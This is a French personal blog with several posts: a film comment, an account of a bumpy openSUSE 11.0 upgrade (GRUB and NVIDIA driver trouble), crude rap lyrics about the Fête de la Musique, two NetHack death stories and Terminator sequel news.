Notez qu'à chaque visionnage du film on peut remarquer certains détails comme le hamster défoncé à la coke qui courre dans un tarré en arrière plan dans sa roue :D
On note aussi la présence de vrais pubs (scène ou Octave roule en BMW, réunions où les gens tournent à Volvic, créateur artistique sous Apple, emballage KFC sur le bureau, caméra numérique Sony...) Comme quoi, pub, anti-pub, ou anti-anti-pub, la morale est que tous les moyens sont permis pour nous faire acheter un produit et qu'on n'y échappera jamais. D'ailleurs peut-on réussir à faire un film sans laisser une marque s'introduire par inadvertance ?

Dans tous les cas, c'est un très bon film, peut-être un peu déroutant au début mais intéressant et très critique tout en restant amusant.

Attention ça va taper :D

Mise à jour vers openSUSE 11.0

Récit d'un passage de openSUSE 10.3 à openSUSE 11.0, réussi mais non pas sans difficultés.

Comme d'habitude, et après avoir attendu l'annonce officielle de sa sortie, je me suis lancé dans le téléchargement d'openSUSE 11.0.
Le téléchargement par torrent m'ayant pris toute une soirée (malgré le déblocage des limites présentes par défaut dans Azureus) à une vitesse oscillant entre 100 et 600 ko/s pour le DVD d'installation de 4.3Go, l'installation en elle-même a dû être repoussée à la soirée suivante :(

Finalement j'insère la galette puis, confiant, redémarre sur le DVD sans avoir pris la moindre mesure supplémentaire (sauvegarde de données, configuration etc)
Cette fois l'installeur est tout neuf, il ne s'agit pas d'une simple retouche comme pour la dernière fois où on voyait encore des libellés de la version précédente.

Les partitions chiffrées sont bien reconnues, le mot de passe est demandé pour le montage. En revanche un avertissement est donné pour la partition temporaire chiffrée que je dis au système d'ignorer.

On passe ensuite à l'installation des logiciels. Une liste de dépôts communautaires est proposé, la majorité des logiciels sont remplacés par ceux du DVD, d'autres rappatriés depuis les dépôts.
Quelques erreurs de dépendances sont relevées, YaST propose différentes solutions pour corriger ces problèmes. Bizarrement pour chaque paquet où il a détecté une erreur, une des solutions proposée et d'installer des paquets par Packman. C'est assez surprenant car il ne s'agit pas d'un dépôt officiel et trop de paquets en provenance de tels dépôts peut transformer les mises à jours en un vrai casse-tête.
Je tiens à signaler qu'ils s'agissait de paquets normalement présents sur un DVD d'install d'une distribution Linux, dans mon cas j'ai dû me résigner à supprimer DirectFB ainsi que ImageMagick.

Finalement après installation des paquets, je redémarre la machine. GRUB n'a pas l'air de savoir ce qu'il doit faire, aucun système d'exploitation n'est proposé.
Je redémarre avec le DVD d'installation, passe en mode réparation et lance une vérification des partitions et du boot loader. Finalement il effectue les opérations qu'il aurait dû faire précédemment.
Je note le passage à ntfs-3g pour les partitions Windows. Enfin une bonne nouvelle :)
Nouveau redémarrage... les partitions Windows ne sont pas proposées pour le démarrage (encore quelque chose qu'il faudra corriger) mais au moins je peux lancer openSUSE 11.0 sur le système :)

A priori quelque chose s'est mal passé avec le framebuffer puisque la police de caractère utilisée pour afficher les messages kernel/initd est énorme et aucune mise en forme graphique n'est présente (pas le moindre penguin à l'horizon) contrairement à ce que j'avais avec la 10.3 :(

Le serveur X se lance, aucune trace du logo NVIDIA à l'écran... logique. Arrêt de X, passage en mode console, re-compilation du module et relance du serveur X : cette fois j'ai un écran noir persistant à la place du logo NVIDIA.
Je récupère la dernière version du driver de la carte graphique sur le site officiel et recommence sans grande conviction. Effectivement pas de changements. Ca démarre très bien avec le module libre donc je remets à plus tard.

Peu de surprises en ouvrant ma session KDE 4.0, le seul changement graphique est la nouvelle icône du menu principal. Par contre, première claque avec la nouvelle applet de mise à jour du système. Si l'aspect ne change pas, des améliorations plus que notables ont été faites sur le temps de vérification des mises à jour et sur l'utilisation mémoire. On en vient à se demander pourquoi l'ancienne version était si gourmande et lente.

YaST2 a aussi changé, surtout pour le gestionnaire de paquets. On peut pas dire qu'il ait gagné dans les changements : moins beau, moins lisible et moins fonctionnel.
Première erreur, les paquets pouvant être mis à jour ne ressortent pas assez. Au lieu de surligner la ligne entière comme c'était le cas avec l'ancienne version, seule la colonne du numéro de version est mise en valeur.
Le second problème concerne les raccourcis clavier qui merdouillent (on est renvoyé au bas de l'affichage en voulant mettre à jour avec '>' alors qu'on n'a rien demandé).

Après je n'ai pas rencontré de difficultées particulières, si ce n'est le nom Azureus qui est devenu Vuze, ce qui explique pourquoi je ne le trouvais pas dans les dépôts.

Bref ça n'a pas été ma meilleure expérience en tant qu'utilisateur d'openSUSE. Et je cherche toujours une solution pour le driver NVIDIA :(

L'Atelier - La Fête de la Musique

Pour l'occasion, la radio a été vidée puis re-remplie. Pas mal de rock et de hip-hop, une goutte d'électro et de reggae. Une bonne dose de groupes français et quelques lives :)
Bonne écoute ;-)

Tekilatex

Est-ce que c'est la fête de la musique ou bien peut-être la fête de l'amnésie ?
Sors vite ta guitare acoustique et rend hommage à la Russie
Bois une vodka et prend-toi pour un rappeur en chantant des poèmes de Garcia Lorca
Et comme par enchantement tu deviens une rock star
Soudain c'est l'enchaînement des événements liés à ta déchéance
Et tu ne te sens pas à ta place à l'intérieur comme Jean-Pierre Chevènement
Tu sombres dans l'alcoolisme, tu te complais dans ta connerie,
Et tu copules avec ta cousine, tu te jettes du haut de la colline
Voilà ! T'es fier de toi ? T'aurais dû rester à la maison !
Sortir dehors le 21 juin, ça sert à rien, rends-toi à la raison.

James Delleck

La musique, je vais lui faire sa fête comme à une fan en fin de concert qui me chauffe au Batofar
Au coin de la rue il y a pleins de guitares rockeuses qui me fatiguent l'oreille,
Aussi usées que le cul d'une hardeuse
Ça me saoule les crins-crins d'étudiants de Paris
Et si ils jouent faux ils disent :

Mortel ! A la fin c’était jazzy

Là je croise une pop-star amateur qui veut être le best
Genre foncedé comme un hamster coincé dans un crash-test
L'ambiance est chirdé au folk-n-roll
Alors je lui dis : Mais non ! Je pelote pas ta meuf ! T'as ma parole !
En passant, je rappe sur un scène gothique

Ouille...

Mais vu que j'ai déchiré, je vais me faire sucer par des gargouilles
22.06.01, je m'assoupis comme un gentil MC
Les bourses vides et les tympans pleins de bruit.

Fuzati

C'est la fête de la musique, mais comme à toutes les fêtes, je n'ai pas été invité
La musique ne m'a jamais aimé
Et moi qui croyait que ce concept n'appartenait qu'à mes parents, je suis déçu...
Avec les batraciens, je dois garder le dessus
J'ai l'impression que tout ce que je rappe est trop mortel mais pas toi, et c'est normal, tu n'as pas bu...
Comment veux-tu que les prostituées me donnent de l'amour si les distributeurs refusent de me donner de l'argent ?
Enfermé dans ma chambre, je pense aux gens, je vais vomir, je bande, je me branle, je vais me finir dans les toilettes
A cet instant, j'ai une révélation : le sperme de sidaïque porte à la fois la vie et la mort, je demeure fasciné
En cet instant, j'aimerais avoir le HIV
Mais pas pour trop longtemps
Après je l'échangerais pour quelque chose de plus amusant comme... un yoyo musical
Je regarderais ma femme se faire baiser avant de finir émasculé par de gentils skinheads homosexuels
3 fois 222, c'est le nombre de décibels
J'ai une chemise et des lunettes, ne me tapez pas...

Cyanure

Hey ! Ce soir c'est le bordel !
Sur les bords de la Seine les djembés frappent un peu plus loin des MCs rappent, d'autres hystériques
S'excitent devant Scorpion au bord des larmes à République
Là où le grec-frites est à 25 francs sans frites
Canettes de coke à balles treize pendant que des pick-pockets se fondent dans la fumée des revendeurs illicites de sandwichs merguez
Le marché parallèle de la nourriture, la galère dans la ure
Après le dernier métro la moyenne basse des groupes qui assurent
Et les formations de guinguette aux soirées portes ouvertes devant les bars-rétro, c'est aussi cela la fête...
...Offi-ci-elle de la musique
Certains s'amusent, d'autres vident le stock de bières brunes renfloué le matin même par l'épicier malin du coin qui fera fortune contre couverture nocturne ce soir
Coincé à Bastille, je ne peux me rendre chez Para pour des raisons accessoires
Les autres ont bientôt fini leur partie... Tek au tel m'a dit que le morceau nique, que rapper c'est magique,
Que le marteau-piqueur en regard du bruit que le son fait dans l'arrondissement
Je crois qu'il dit vrai, en tendant l'oreille c'est bien eux que j'entends.
Fête de la musique disaient-ils...

YASD #2

devloop (Sam Hum Fem Law), 13888 points, killed by a gelatinous cube

Se faire tuer par un cube gélatineu ça peut faire rire... mais avant de vous moquer laissez moi vous raconter l'histoire de ma samuraï.

On ne peut pas dire que la chance était de mon côté : les quelques marchands que j'ai croisé étaient inintéressants et surtout je n'ai croisé aucun trône sur mon chemin qui auraient pû me permettre d'identifier les objets trouvés par çi par là (quelques armures et bottes qui auraient pourtant s'avérer plus qu'utiles).
Je ne vous parle même pas de cette feignasse de clébard qui m'a juste aidé à déterminer le BUC d'un casque et d'une bague (dont la connaissance approfondie aurait peut-être pû m'éviter cette mort stupide) en tout début du partie.

Au départ ça allait comme-çi, comme-ça, pas de difficultés majeures et rien d'extraordinaire sur mon chemin... puis je suis descendu dans les mines.
Après avoir emprunté un chemin sinueux sur tombe sur la team gnome. Je m'en tire bien, gagne en expérience, vais déposer mes gains quelques part, reprends le même couloir et tombe cette fois sur la team snake... ça va encore.
Mais sur le chemin du retour, je me fais attaquer par la célèbre team ant. Après en avoir exterminé une bonne partie, je prends la fuite tant bien que mal et atteins les escaliers in extremis avec seulement 3 points de vie ^_^
Revenu à l'étage supérieur, je glande un peu histoire de souffler puis prends les autres escaliers. J'y massacre quelques créatures en tout genre, fait le plein d'armes et armures que je laisse de côté pour une identification future.
Je voulais retourner chez un marchand malheureusement sur son chemin je croise la team rothe, suivie de près par une bande de d'orc zombies et quelques (encore) giant ants.
Après avoir récupéré, je redescends dans les mines pour me taper une bonne tripotée de hill orcs qui se seront bien fait laminés :p

Sur le chemin du retour et pour reprende le chemin standard (sans passer par les mines), j'ai perdu un temps fou à jouer à cache-cache avec des nymphes et des leprechauns (saletés !)
Arrivé à ce stade, toujours rien d'intéressant : ni pioches, ni lock-pick... enfin aucun de ces petits bonheurs simples :(
La partie s'est continuée dans le même style : un moment je suis seul, le moment d'après ils me tombent tous dessus en même temps.

Plus tard j'ai joué à cache-cache avec une bande de chickatrice, sauf que cette fois çi, c'était moi qui me cachait (j'avais pas de gants :( ). Et comme j'étais pris de sauts de téléportation incontrôlés, c'était pour le moins comique... on se serait cru dans Benny Hill :D

Arrivé finalement au niveau de l'Oracle, je prends un chemin longeant la salle principale et tombe sur un cube gélatineu. Automatiquement, je prends du recul pour décocher mon arc et mes flèches et lui mettre dans sa gueule sauf que derrière moi se trouvait une licorne grise... N'étant pas suicidaire, je préfère revenir près du cube qui lui s'était rapproché (saleté !).
La licorne étant partie, je tente de reculer une nouvelle fois mais un singe a fait son apparition et me tape dessus. Je me retrouve finalement coincé entre ce foutu cube et cet £#%*\!+ de singe. Le singe a le temps de donner 6 coups quand l'espèce de gelée en donne un seul... cela n'empèche pas que le coup fatal, celui compatibilisé, a été donné par le cube :(

Le pire étant de savoir après coup (c'est le cas de le dire) que l'anneau que je portait sur l'une de mes mains était un anneau d'action libre. Bref le cube j'aurais pû y mettre sa race ou plus simplement ne pas trop m'en soucier et ça aurait été bien mieux :(

Bilan : 6ème meilleur de mes scores à l'heure de ces lignes, ce qui est plutôt satisfaisant, sauf que finir tué par un cube de gelée après avoir exterminé une légion entière d'orcs ça craint un peu.
J'ai aussi explosé mon record récemment avec un moine (pour ne pas changer) :)

Des nouvelles du Terminator

Si vous êtes comme moi un grand fan de la trilogie Terminator, vous êtes très probablement déjà au courant qu'une nouvelle trilogie est un préparation.

Du moins, ce dont l'on est sûr à l'heure actuelle est qu'un quatrième épisode est en cours, baptisé Terminator Salvation: The Future Begins.
Le scénario de cet épisode se centrera sur la mise en place de la résistance contre les machines en l'an 2018.

Le rôle principal sera tenu par le génialissime Christian Bale qui tiendra le rôle du chef de la résistance John Connor.
Et pour ce qui est de vous donner des maux de têtes, les scénaristes ont décidé d'intégrer le personnage de Kyle Reese incarné par un jeune acteur nommé Anton Yelchin.
Kyle Reese qui est (pour ceux qui ne suivent pas), le père de John Connor revenu du futur pour sauver Sarah Connor du Terminator dans le premier épisode, le tout sur les ordres de John Connor lui même :p

Malgré ce qui avait été annoncé au début, ce n'est pas Charlotte Gainsbourg qui tiendra la rôle de Kate Connor, la femme de John. On avait eu l'occasion de découvrir le personnage dans Terminator 3 : le soulèvement des machines sous son nom de jeune fille, Kate Brewster (alors interprétée par Claire Danes.
C'est finalement l'actrice Bryce Dallas Howard qui décroche le ponpon, Charlotte Gainsbourg étant apparemment occupée par un film français :(

Pour ce qui est de l'apparition d'Arnold Schwarzenegger dans le film, rien n'est confirmé à l'heure actuelle, même si l'on sait par le 3ème opus que John Connor est normalement terminé par un T-101 (modèle construit par le société Cyberdyne).

Quand à la série TV Terminator : The Sarah Connor Chronicles, on attend toujours avec impatience la seconde saison dans laquelle la sublime Shirley Manson, la chanteuse de Garbage, devrait tenir le rôle d'une certaine Catherine Weaver, directrice d'une certaine entreprise baptisée Cyberdyne :p

Pour résumer, on a par ordre chronologique :

Terminator
Terminator 2 : Le Jugement Dernier
Terminator : The Sarah Connor Chronicles (série TV)
Terminator 3 : Le Soulèvement des Machines
Terminator Salvation: The Future Begins

On ne sait pas si la mort de Sarah Connor (normalement d'une leucémie en 1997) sera un jour traitée, la série TV étant chronologiquement la mieux plaçée pour s'en occuper. Dans tous les cas félicitations aux différents scénaristes qui parviennent malgré tout à être cohérents dans ce labyrinthe de dates (surtout que la série en rajoute avec un déplacement dans le temps à un moment :D )

D'après Wikipedia, on devrait avoir un premier teaser de l'épisode 4 en avant première des diffusions de The Dark Knight, le prochain Batman avec Christian Bale dans le rôle principal (sortie aout 2008 en France) :)

YASD #1

Yet Another Stupid Death dans le langage des joueurs de NetHack.

J'étais pourtant bien parti avec ma barbare (chaotic female human Barbarian). Les coups de poisse et de chance s'alternaient mais je m'en tirais bien.
J'ai essayé de lire à plusieurs reprises un livre de sort non-identifié qui m'a joué quelques tours malgré qu'il ne soit pas maudis. Par exemple cela faisait disparaître tout mon or et même arrivé à un niveau 8 d'expérience sa lecture était toujours problématique.
J'ai aussi eu à faire à deux fantomes à la suite (deux bones files dans la même partie et à la suite, je ne sais pas si c'est courant...) qui m'ont apporté pas mal d'objets en tout genre mais dont je n'ai pas eu l'occasion de déterminer la béatitude.

Le top, c'est que j'ai eu l'occasion de faire un voeu en m'asseyant sur un trône et ainsi d'obtenir un blessed greased +2 silver dragon scale mail (une armure en écailles de dragon argenté) qui s'est montrée plus qu'efficace :)
J'ai également pu tuer une licorne dont la corne m'a rendu la vue une fois où j'étais aveuglé.

J'ai pu améliorer mon maniement de la hache, de l'épée ainsi que des dagues... malheureusement la hache a été cassée à un moment en tentant d'ouvrir un coffre :(

Bref tout allait pour le mieux... jusqu'à ce que je vois apparaître au loin une bête lumière jaune. Par réflexe, je fouille dans mon inventaire puis tombe sur un bandeau que j'utilise pour m'aveugler...
Seulement ce dernier était maudi... impossible de le retirer !!! J'aurais dû m'en douter puisqu'il faisait parti des éléments récupérés de l'un des fantômes malheureusement je suis allé un peu vite ce coup-çi :(

Sans la moindre idée de comment le retirer, je me déplace avec quelques difficultées car j'avais mangé un leprechaun qui me faisait me téléporter de manière aléatoire :(

Pour terminer, et après avoir exterminé une bande de chacals sans difficulté (et les yeux toujours bandés), j'ai finalement donné un coup sur une créature qui s'est avéré être une chickatrice, ce qui m'a transformé en pierre :(

Au final : partie intéressante et 5ème de mes meilleurs scores jusqu'à présent alors que j'aurais sans doute pû aller bien plus loin :(

Goodbye devloop the Barbarian...
You turned to stone in The Dungeons of Doom on dungeon level 8 with 10573 points,
and 989 pieces of gold, after 5310 moves.
Killer: a chickatrice corpse
You were level 8 with a maximum of 81 hit points when you turned to stone.